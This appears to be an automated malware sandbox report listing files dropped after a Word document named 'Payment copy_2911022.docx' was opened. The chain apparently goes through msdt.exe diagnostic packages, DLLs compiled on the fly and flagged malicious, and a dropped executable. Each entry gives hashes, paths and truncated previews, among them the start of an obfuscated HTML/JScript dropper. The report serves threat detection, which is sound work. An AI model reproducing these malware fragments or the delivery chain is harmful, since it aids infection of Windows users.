C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\B87Z87FM\PROMZwFp385vXr[1]

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
File Type:	HTML document, ASCII text, with very long lines (6346), with CRLF line terminators
Category:	dropped
Size (bytes):	8032
Entropy (8bit):	6.106485999431441
Encrypted:	false
SSDEEP:	96:+Y8gdLn2wOlVE82u5WUqhy0J2bnR5PojA6pAohjN6pKpGPZCzYw9gz1fUIN3U0s:+Y7L2wO9IUNv5PoV6w6peGRx7pE0s
MD5:	7934E5C18F2C7C53DCE7C8C7CE55125D
SHA1:	8C75630C574D0745E4F3B71B26057C990E2BB467
SHA-256:	7C92FD542BC5E2B201FB2DE4FC1DACE37FF9DFC02CE40FD1BD26E61ED41DB3EA
SHA-512:	1E8D31AF033C0E3DF7D4DCF427D92702F733E13CE1686E0E1BDB0711E882F2AE18C479F363A535B366D1A4838E363C163513B7091DD81CBD9961D18C1C293C13
Malicious:	false
Preview:	<!DOCtYpe HTML>....<HTML>....<BoDY>....<SCrIPt tYPE="tExT/jscriPt">....//h0dZzxaXmdafHlX0peZ3Z6KdUZZJWUzo5yImhiYs23ky3QbfS1f5QchuYj7Z23xqB4rX1uTcMWxKu6tqkeFx4wq67bofKXUQtZUOMJ0leLPGFZ4acpSAwsQE6Rn6pfFZ8jKq7inOpnEKTaouxoSFRC5LQYEQuHsLnrWRhtVUm9a31xlrfuPjxgVSyDI9z73koEGhVdn7PgdwGSaTgNSAu7Kbgh7qUyQo38fAxiJIdgWYcrvltWm3hHDpQIr0oceaSpvNRuj4NRPOUxRlCbVxjxo87HgALrN5tbArN0gRVES1IXnWWuoOQvnafwksWSGLJlZ7BnqSxKpwQMd3kiqsBxnCzYCfiCyPaYHjE2rAd1fiIDcOoJlyOrUzzOD3Ms9HeHRBxWNZQa7qKtPaaziBTOW1YkvZrFT1NDE2l25iFJNttAfd00r4qLXIcuUkb7Zehemp2Nbd0SYLQo2bxfN8tUEr38580F7CVqH3CHcMcLqmJcAULEOu2cEknjqFUQlhi6rGfZluyDNhyNjL6z5wfVBykxwbQRABEgg0p0hKzMJenqND6EalCvmao6WlG4ygxtum5N6dZ5p9Dom5HE4t3gdcsSkFM5rDn0h9sSbsce3jc5Y2WGhrbXR4sIlZAHSpfHCcZ2r52KAwQPO4jcbDIIp1htkI4QSXT1ZjatYGjQII2ZwEqZyTVhTSGYqvTJTP6Vx1KoJTcCdLqNrYjPvAeY1RSWC0njCQT1W0EYojbwIaGan3JOeq8e8zC6y3QQGeVpREevg5avTahzPlVqI0MkS8PaLcmDL75EqE2hcXUSJrZMMiC00DkeeuxEREGs4p7UuWlfF9BnyvHUIxJBwyg7NMmKQPHA8qWtldGaEvcDaLD8tVkeGqavHUm9TgFt9CDkb7wFEuf1Lcn7mPPg8Krt2Lr0ibYoo

C:\Users\user\AppData\Local\Temp\RESBBFF.tmp

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
File Type:	Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x4ae, 9 symbols, created Tue Dec 20 22:15:19 2022, 1st section name ".debug$S"
Category:	dropped
Size (bytes):	1364
Entropy (8bit):	4.101052508447827
Encrypted:	false
SSDEEP:	24:HNFC9AW7F5A2H5hKnyfeI+ycuZhNORakSRWPNnq9Wd:thW7F5A2nKnym1ulUa3Iq9m
MD5:	40FC2C8882D80BF450FDB1440FA8908D
SHA1:	1A0EE5EED4078E6274F199D6404FBBAE98311232
SHA-256:	F2C59F3C2E2F83940877C101A4A0959F64DD10887D0BCECD3E248497CDD40C1A
SHA-512:	7CAC959BE5E13F59025DB8E2E9276240FF7386945A5FB138DEDC47FBC2C2417BD36246F214A3D2E00CF0D6C09B81A7F1BECE4999C7738604652DAD7C0AEC058F
Malicious:	false
Preview:	L....3.c.............debug$S........p...................@..B.rsrc$01........X.......T...........@..@.rsrc$02........P...^...............@..@........S....c:\Users\user\AppData\Local\Temp\yjsbg2wl\CSCC31FCDA79CE4E0C894720F359978C2.TMP...................b..q..2..^}]...........5.......C:\Users\user\AppData\Local\Temp\RESBBFF.tmp.-.<...................'...Microsoft (R) CVTRES...=..cwd.C:\Windows\TEMP\SDIAG_4fa3b06e-fc60-4be1-bad6-e51754719c96.exe.C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe..............................................0.......................H.......L...........H.........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...y.j.s.b.g.2.w.l...d.l.l.....(.....L.e.g.a.l.C.o.p.

C:\Users\user\AppData\Local\Temp\RESC7C7.tmp

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
File Type:	Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x4b2, 9 symbols, created Tue Dec 20 22:15:22 2022, 1st section name ".debug$S"
Category:	dropped
Size (bytes):	1368
Entropy (8bit):	4.087921279068652
Encrypted:	false
SSDEEP:	24:Hg3W9ok7Gml8H1hKnyfeI+ycuZhN+akSmPNnq9Yld:G/uGml8DKnym1ul+a3aq9YP
MD5:	9DB740FA4600D9536F6380F97F1F1D81
SHA1:	C8C1B401704F8CB67DA207CD00E16EB3511EEB28
SHA-256:	A94477149561D93605258CC3077699B66226D811454489D7751857525AA5EFF2
SHA-512:	396EF6C62D7FE717426130F4D7C36826E72D9A95A211374479F292C36AB9F4787316FEDB62645364B92DE0788BDE1355AC1EE122F40E1AF2B631E142B252B78B
Malicious:	false
Preview:	L....3.c.............debug$S........t...................@..B.rsrc$01........X.......X...........@..@.rsrc$02........P...b...............@..@........U....c:\Users\user\AppData\Local\Temp\zf01cjt2\CSCBCE7B9C025BF4B8F8112717E4D466AA3.TMP.................../M.g..C0....E%u..........5.......C:\Users\user\AppData\Local\Temp\RESC7C7.tmp.-.<...................'...Microsoft (R) CVTRES...=..cwd.C:\Windows\TEMP\SDIAG_4fa3b06e-fc60-4be1-bad6-e51754719c96.exe.C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe..............................................0.......................H.......L...........H.........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...z.f.0.1.c.j.t.2...d.l.l.....(.....L.e.g.a.l.C.

C:\Users\user\AppData\Local\Temp\RESE5AF.tmp

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
File Type:	Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x4b2, 9 symbols, created Tue Dec 20 22:15:30 2022, 1st section name ".debug$S"
Category:	dropped
Size (bytes):	1368
Entropy (8bit):	4.06707224953585
Encrypted:	false
SSDEEP:	24:H73W9oYnP7HEhKnyfeI+ycuZhNHakSJPNnq9Yld:j/wz2Knym1ulHa3rq9YP
MD5:	F06D46F0D52B00871DE876DF1BC85BF6
SHA1:	3011CE90C67AEDDCFC931E2DF85FA8B5406DD206
SHA-256:	484708E37EC4D08C459CFCE33723B8FBAFEB417BBD3F35CFA88CA4F07BF9F1B8
SHA-512:	3119E51EF3244A00C2A77CF8D3A632C0262F7D1936A5CD41A7D4D68385964F57290201FD932B28B3CC51A96B64C5FF01C18A7A3348922BEA202C31981A5B2A8C
Malicious:	false
Preview:	L....4.c.............debug$S........t...................@..B.rsrc$01........X.......X...........@..@.rsrc$02........P...b...............@..@........U....c:\Users\user\AppData\Local\Temp\mnm1snwx\CSCC987513427A042F884BC2F5ADDB1C11C.TMP..................,C..68.2*..%..h...........5.......C:\Users\user\AppData\Local\Temp\RESE5AF.tmp.-.<...................'...Microsoft (R) CVTRES...=..cwd.C:\Windows\TEMP\SDIAG_4fa3b06e-fc60-4be1-bad6-e51754719c96.exe.C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe..............................................0.......................H.......L...........H.........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...m.n.m.1.s.n.w.x...d.l.l.....(.....L.e.g.a.l.C.

C:\Users\user\AppData\Local\Temp\mnm1snwx\CSCC987513427A042F884BC2F5ADDB1C11C.TMP

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
File Type:	MSVC .res
Category:	dropped
Size (bytes):	652
Entropy (8bit):	3.097418828880271
Encrypted:	false
SSDEEP:	12:DXt4Ii3ntuAHia5YA49aUGiqMZAiN5gryFak7YnqqJPN5Dlq5J:+RI+ycuZhNHakSJPNnqX
MD5:	2C43B4B4363800322A99EB25090568AC
SHA1:	862B9B5F18553CD35E912469E0741137E1FCAD66
SHA-256:	BD825478BA796BA39A506A6C91D3C1274C947282D510D15E0B1263A240488DC2
SHA-512:	54FB346DAE535844BDC5B35D1F85AD67A7E340D316663A6DE32CB7345B7B75CDDB76C865D9DBE29A8218D293047404235891A596D225C805C7E0AB08B05A41B3
Malicious:	false
Preview:	.... ...........................L...<...............0...........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...m.n.m.1.s.n.w.x...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...m.n.m.1.s.n.w.x...d.l.l.....4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0...

C:\Users\user\AppData\Local\Temp\mnm1snwx\mnm1snwx.dll

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	3072
Entropy (8bit):	2.7563975614745995
Encrypted:	false
SSDEEP:	24:etGSplEZmoY2rjB8a8Htzk2SJltkZfxWqCw1WI+ycuZhNHakSJPNnq:6plboFeau8QJxWq21ulHa3rq
MD5:	9D91EAB662E2388525D6EE5B47159801
SHA1:	F2E95F5592B5AA5FB88BE5EF547D17F55B786E44
SHA-256:	95C9F839F226B7C4FC61FA7A0A5F61BD6CA74A2B77E0F2BDB90D94609F2B5651
SHA-512:	CC03D718AEE40E521210822C0F3B9E3ACA10E453992911495C6F748CEB6BACABD54822A3890BAB0322724894BCDE3030A9AED3475E7A412E91D84E2776F555D2
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....4.c...........!.................#... ...@....... ....................................@.................................@#..K....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B................p#......H.......X ................................................................(....BSJB............v4.0.30319......l.......#~..........#Strings............#US.........#GUID.......L...#Blob...........G.........%3............................................................-.&...\|.\.....\.......................................... 4.....P ......F.........L.....O.....S.....V.....Y...F.....F...!.F.....F.......!............4..................................................<Module>.mn

C:\Users\user\AppData\Local\Temp\yjsbg2wl\CSCC31FCDA79CE4E0C894720F359978C2.TMP

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
File Type:	MSVC .res
Category:	dropped
Size (bytes):	652
Entropy (8bit):	3.10673009087742
Encrypted:	false
SSDEEP:	12:DXt4Ii3ntuAHia5YA49aUGiqMZAiN5gryC3Rak7YnqqR3WPN5Dlq5J:+RI+ycuZhNORakSRWPNnqX
MD5:	FE7FCD62FC817186E132AF045E7D5DB3
SHA1:	9A642E2B6A6B6673BE0AD676805EA7FD77E2DA19
SHA-256:	CCFCD9D169A2FA05139FA0C98EDD8CF1B5093AB15EE7FB2D98B2318D739AC120
SHA-512:	AD1896893DE173DB8105B9D3160103DEC96E164ACF52E985DB2C579D353788211B5C11704C42752DAE79B9202977C7D6D49651B8CA039956F0B55D9617ED88DF
Malicious:	false
Preview:	.... ...........................L...<...............0...........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...y.j.s.b.g.2.w.l...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...y.j.s.b.g.2.w.l...d.l.l.....4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0...

C:\Users\user\AppData\Local\Temp\yjsbg2wl\yjsbg2wl.dll

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	5120
Entropy (8bit):	3.7807012254070815
Encrypted:	false
SSDEEP:	48:6+oPhmKraYZkH8KTibUyOkwjj0Jl/C+CFSlwY2c1ulUa3Iq:gDaAkHHo4k8GDCuiCK
MD5:	8E841113C261020EC331301E8EA95FF1
SHA1:	87327FD70AE30C8B7E7FDE677A9A1861C20ABCC3
SHA-256:	0050E943E39929EEBE15596558C45EA0013BEA50683C563CC067EF6D50836701
SHA-512:	55B9B299ECB57831A18B2CEE4042368C90CFC3BE3E37DA615A1C9D532A34AC5361D3F7B1A9A5D1770F95CF723E3DC4ABF658A25E2F2E2DDD8E0813651932F9F6
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....3.c...........!................>... ...@....... ....................................@..................................)..S....@.......................`....................................................... ............... ..H............text...D.... ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B................ ......H....... ".............................................................."..(....J.#(....r...p(......(....2~.....(........0.......... ....s..... ....s...............r;..p.........(......s.............5.....".....5.....3+E...../...(.-...2.3+1...:3...+)....3...+....+...+...+...+...,...+...+......r;..p...o................ ...o.........+Y.......r=..p..o......1.r=..p..o..........+(r...p..o...........(........r...p(.........X.......i2..........(.........o........o....-.r...p....

C:\Users\user\AppData\Local\Temp\zf01cjt2\CSCBCE7B9C025BF4B8F8112717E4D466AA3.TMP

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
File Type:	MSVC .res
Category:	dropped
Size (bytes):	652
Entropy (8bit):	3.114284520242683
Encrypted:	false
SSDEEP:	12:DXt4Ii3ntuAHia5YA49aUGiqMZAiN5gryAak7YnqqmPN5Dlq5J:+RI+ycuZhN+akSmPNnqX
MD5:	DC2F4DBB67DF174330B6FA95DC452575
SHA1:	78BD93FA7A908C025392F4C5831CA9E97D506510
SHA-256:	12FF8D595E979C28792CC061C54F13F76E500C81CD784C35EEC20CB6B890B267
SHA-512:	C6B7E756C3F66677AB2A2215A1426F0DBDD8302A74A633FA10F48EDC7FF06F6C3A87969505EE3D32257F810A6E3B91E51D6B6CB7BB224046ED8224E77C9A96A7
Malicious:	false
Preview:	.... ...........................L...<...............0...........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...z.f.0.1.c.j.t.2...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...z.f.0.1.c.j.t.2...d.l.l.....4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0...

C:\Users\user\AppData\Local\Temp\zf01cjt2\zf01cjt2.dll

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	3584
Entropy (8bit):	3.0913082990719554
Encrypted:	false
SSDEEP:	24:etGSP9pz1qlkCe745Q7GslPorREjvX5ekjV4gztkZf8jy6Iv+TOBWI+ycuZhN+a3:67pqb927GslPuEDRjyJ2ck1ul+a3aq
MD5:	98F7687F9AD551B97B536497BC02895F
SHA1:	19CA5F6ED4CCC75C28BE47E1FFEB38B401FA1679
SHA-256:	87DFA2576F7173C54D1D6EC2E081485D238153541097A8373C6F116C21F07D8E
SHA-512:	98783F9CEDC7DD4BA22CB093F3B1DF52AC7CDAC7B3525D97CEAB582D95A31EBE82DFA29C2A450B26DD17DC39781E1A97432205A545641C0F4B42AF40A509D35A
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....3.c...........!.................%... ...@....... ....................................@..................................$..K....@.......................`....................................................... ............... ..H............text...4.... ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................%......H........ ..4............................................................0..6....... ....s........o....(....,..o....r...pr...po....~....F.r...pr...po......(....BSJB............v4.0.30319......l.......#~..........#Strings............#US.........#GUID.......t...#Blob...........W=........%3............................................................................2.+...N.B.....................0.....W.......+.............................Q.9.......... \.....P ......j...... ..

C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\Payment copy_2911022.docx.LNK

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Tue Aug 16 21:23:07 2022, mtime=Tue Dec 20 21:14:40 2022, atime=Tue Dec 20 21:14:17 2022, length=110504, window=hide
Category:	dropped
Size (bytes):	1135
Entropy (8bit):	4.696246643727346
Encrypted:	false
SSDEEP:	12:80fXKOUf6CHiDO2aGXVD2i+WxKk2jA+/yRevyjRmKDyA5viPviT4t2Y+xIBjKZm:8OXW2zJ2qbKA+KRevyjRrDyE7aB6m
MD5:	1C4B189F901D3F0320BC0EFC7C62C7E6
SHA1:	635A94CD6CA12CF28D2154B45B90EC217A159A67
SHA-256:	2F891729078A24AC1CBE4DBE8542D640E3605557735D378DA1DC86FB71FFEA10
SHA-512:	FD31CCFF0F17646DA50DD0FD0EAC97C6A07C33F2CD3D5221643F221C5437D433C29EFDC69A02F4DE58595024C7D6CA120DA46ECF13B46C2D2F0EB75FA86D4EEA
Malicious:	false
Preview:	L..................F.... ...B........t.......g.................................P.O. .:i.....+00.../C:\...................x.1......Ng...Users.d......L...U.....................:......B..U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....T.1......U...user..>.......NM..U......S....................:.8.a.l.f.o.n.s.....~.1......U...Desktop.h.......NM..U......Y..............>.......m.D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.......2......U. .PAYMEN~1.DOC..l.......U.U.....`......................t..P.a.y.m.e.n.t. .c.o.p.y._.2.9.1.1.0.2.2...d.o.c.x...d.o.c.......d...............-.......c...........>.S......C:\Users\user\Desktop\Payment copy_2911022.docx.doc..4.....\.....\.....\.....\.....\.D.e.s.k.t.o.p.\.P.a.y.m.e.n.t. .c.o.p.y._.2.9.1.1.0.2.2...d.o.c.x...d.o.c.........:..,.LB.)...Aw...`.......X.......061544...........!a..%.H.VZAj...#1...........W...!a..%.H.VZAj...#1...........W..............1SPS.XF.L8C....&.m.q............/...S.-.1.-.5.-.2.1.-.3.8.5.3.3.2.

C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
File Type:	Generic INItialization configuration [doc]
Category:	dropped
Size (bytes):	101
Entropy (8bit):	4.8491372958945425
Encrypted:	false
SSDEEP:	3:bDuMJltDLhVjO1LXJFSmX1OeLhVjO1LXJFSv:bCmDFVyBZFEeFVyBZFc
MD5:	83166E435F433132ECCE71984113EC6B
SHA1:	630B8125CF2F042D3C939B375300C4A03B849927
SHA-256:	DEE2789C5DBCFF0EA579537C38D15E0626092269B5842B7D1BAAFBA4DC43F308
SHA-512:	DFE14FDBE0BC45AD547A41CE549670CD1F9B39210E698A09BF558D643B7159D740E7C52A2773F6F9E44AD9FF07DE877C8FDD709864CA8668556B86AA82135D9B
Malicious:	false
Preview:	[folders]..Templates.LNK=0..Payment copy_2911022.docx.LNK=0..[doc]..Payment copy_2911022.docx.LNK=0..

C:\Users\user\AppData\Roaming\Microsoft\Templates\~$Normal.dotm

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
File Type:	data
Category:	dropped
Size (bytes):	162
Entropy (8bit):	2.2176866822593855
Encrypted:	false
SSDEEP:	3:Rl/ZdH3KcRlpXtlqKaGclilt/9d3Pf/Z:RtZF6cDpKAclG9fp
MD5:	4C91944AA2F600B7E6ED428F40C755B7
SHA1:	2CBEE65F3B204188A112A9B55989B44A56D956B8
SHA-256:	FFADC0028A08DA39C26C1DE8DD419414DC4133CD8609E79EA0AFED17A719D016
SHA-512:	B8BB3DF46466CC3706FB090F4934103782CD45F53CBA080B35F8F6406AC2ED511388CF2E15F9AE4F467899C9AE8B99DF41839F65D3132B2772489BD0B9F11E5E
Malicious:	false
Preview:	.pratesh................................................p.r.a.t.e.s.h.........s..y............T.......6C.........y./..........................{..y.0..............

C:\Users\user\AppData\Roaming\Microsoft\UProof\CUSTOM.DIC

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
File Type:	Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	20
Entropy (8bit):	2.8954618442383215
Encrypted:	false
SSDEEP:	3:QVNliGn:Q9rn
MD5:	C4F79900719F08A6F11287E3C7991493
SHA1:	754325A769BE6ECCC664002CD8F6BDB0D0B8CA4D
SHA-256:	625CA96CCA65A363CC76429804FF47520B103D2044BA559B11EB02AB7B4D79A8
SHA-512:	0F3C498BC7680B4C9167F790CC0BE6C889354AF703ABF0547F87B78FEB0BAA9F5220691DF511192B36AD9F3F69E547E6D382833E6BC25CDB4CD2191920970C5F
Malicious:	false
Preview:	..p.r.a.t.e.s.h.....

C:\Users\user\AppData\Roaming\Microsoft\UProof\ExcludeDictionaryEN0409.lex

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
File Type:	Unicode text, UTF-16, little-endian text, with no line terminators
Category:	dropped
Size (bytes):	2
Entropy (8bit):	1.0
Encrypted:	false
SSDEEP:	3:Qn:Qn
MD5:	F3B25701FE362EC84616A93A45CE9998
SHA1:	D62636D8CAEC13F04E28442A0A6FA1AFEB024BBB
SHA-256:	B3D510EF04275CA8E698E5B3CBB0ECE3949EF9252F0CDC839E9EE347409A2209
SHA-512:	98C5F56F3DE340690C139E58EB7DAC111979F0D4DFFE9C4B24FF849510F4B6FFA9FD608C0A3DE9AC3C9FD2190F0EFAF715309061490F9755A9BFDF1C54CA0D84
Malicious:	false
Preview:	..

C:\Users\user\AppData\Roaming\PMoZbw\PMoZbw.exe

Download File

Process:	C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	1187840
Entropy (8bit):	7.694771401738945
Encrypted:	false
SSDEEP:	24576:aucfV6hgv0QFYDQ+ccbb1bwaZ+ZgAC0G3yMjS+837EptQlKT:hcNT0CYDQ+ccbb5DZqC0OyMuzyt+K
MD5:	65FACCEC1C27EA47BF295191E93BFF41
SHA1:	ED1B66F2B4E1BA60DE601CDB9CA230338AE167CE
SHA-256:	0C31951E2A4B9376D72EB266EE9BDF6F0AC513DFBC2F918FF344202100CD0973
SHA-512:	038E543D478D988EAE2E4DAB6B148ACC4084A79F660418C979642424695B735AB24A1E24D868C62E098BD1015C8E4996A85E9BE6A3D1FAEF888C63DB7B153EFB
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 38%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.... .c..............P..............'... ...@....@.. ....................................@.................................@'..K....@..,....................`.......&............................................... ............... ..H............text........ ...................... ..`.rsrc...,....@......................@..@.reloc.......`......................@..B................p'......H.......$g..D...........h....>..........................................n~Y...(N...8.....(....8....&~..........~.....v~Y...(N...8......(....8.......&~..........~......0..~.......8........E....B...8=...~Y...(N...8....s.........8-...s.........8....s.........8....s.........8....s......... .....:....&8.......0..$.......8....8....8.....~....o......8.......0..$.......8......8....8.....~....o......8.....0..$.......8....8....8.....~....o......8.......0..$.......8......*8...

C:\Users\user\Desktop\~$yment copy_2911022.docx.doc

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
File Type:	data
Category:	dropped
Size (bytes):	162
Entropy (8bit):	2.2176866822593855
Encrypted:	false
SSDEEP:	3:Rl/ZdH3KcRlpXtlqKaGclilt/9d3Pf/Z:RtZF6cDpKAclG9fp
MD5:	4C91944AA2F600B7E6ED428F40C755B7
SHA1:	2CBEE65F3B204188A112A9B55989B44A56D956B8
SHA-256:	FFADC0028A08DA39C26C1DE8DD419414DC4133CD8609E79EA0AFED17A719D016
SHA-512:	B8BB3DF46466CC3706FB090F4934103782CD45F53CBA080B35F8F6406AC2ED511388CF2E15F9AE4F467899C9AE8B99DF41839F65D3132B2772489BD0B9F11E5E
Malicious:	false
Preview:	.pratesh................................................p.r.a.t.e.s.h.........s..y............T.......6C.........y./..........................{..y.0..............

C:\Windows\Temp\SDIAG_4fa3b06e-fc60-4be1-bad6-e51754719c96\DiagPackage.diagpkg

Download File

Process:	C:\Windows\SysWOW64\msdt.exe
File Type:	HTML document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	24702
Entropy (8bit):	4.37978533849437
Encrypted:	false
SSDEEP:	96:fO3MDP8m2xaqade1tXv8v/XPSwTkal+7lOaNeHdXQZvczyJuz4UnPz0Kuz+NGTEP:O5NzuCWNaEcU8mjapMVOHW
MD5:	191959B4C3F91BE170B30BF5D1BC2965
SHA1:	1891E3CB588516B94FDC53794DA4DF5469A4C6D0
SHA-256:	8EC3A8F67BAF1E4658FC772F9F35230CA1B0318DDAF7A4C84789A329B6F7F047
SHA-512:	092CC417FBFE7F6E02A60FF169209D7B60362B585CBF92521BFC71C0B378D978DFB9265A3E48C630CE6ABAB263711D71F3917FFAF51B6FD449CFC394E9D8C3A9
Malicious:	false
Preview:	<dcmPS:DiagnosticPackage SchemaVersion="1.0" Localized="true" xmlns:dcmPS="http://www.microsoft.com/schemas/dcm/package/2007" xmlns:dcmRS="http://www.microsoft.com/schemas/dcm/resource/2007">.. <DiagnosticIdentification>.. <ID>PCW</ID>.. <Version>3.0</Version>.. </DiagnosticIdentification>.. <DisplayInformation>.. <Parameters/>.. <Name>@diagpackage.dll,-1</Name>.. <Description>@diagpackage.dll,-2</Description>.. </DisplayInformation>.. <PrivacyLink>https://go.microsoft.com/fwlink/?LinkId=534597</PrivacyLink>.. <PowerShellVersion>2.0</PowerShellVersion>.. <SupportedOSVersion clientSupported="true" serverSupported="true">6.1</SupportedOSVersion>.. <Troubleshooter>.. <Script>.. <Parameters/>.. <ProcessArchitecture>Any</ProcessArchitecture>.. <RequiresElevation>false</RequiresElevation>.. <RequiresInteractivity>true</RequiresInteractivity>.. <FileName>TS_ProgramCompatibilityWizard.ps1</FileName>.. <ExtensionPoint/>.. </Script>..

C:\Windows\Temp\SDIAG_4fa3b06e-fc60-4be1-bad6-e51754719c96\DiagPackage.dll

Download File

Process:	C:\Windows\SysWOW64\msdt.exe
File Type:	PE32+ executable (DLL) (console) x86-64, for MS Windows
Category:	dropped
Size (bytes):	66560
Entropy (8bit):	6.926109943059805
Encrypted:	false
SSDEEP:	1536:ytBGLADXf3iFGQ+/ReBQBJJgUKZgyxMBGb:ytBGcDXvKoRqKuxgyx
MD5:	6E492FFAD7267DC380363269072DC63F
SHA1:	3281F69F93D181ADEE35BC9AD93B8E1F1BBF7ED3
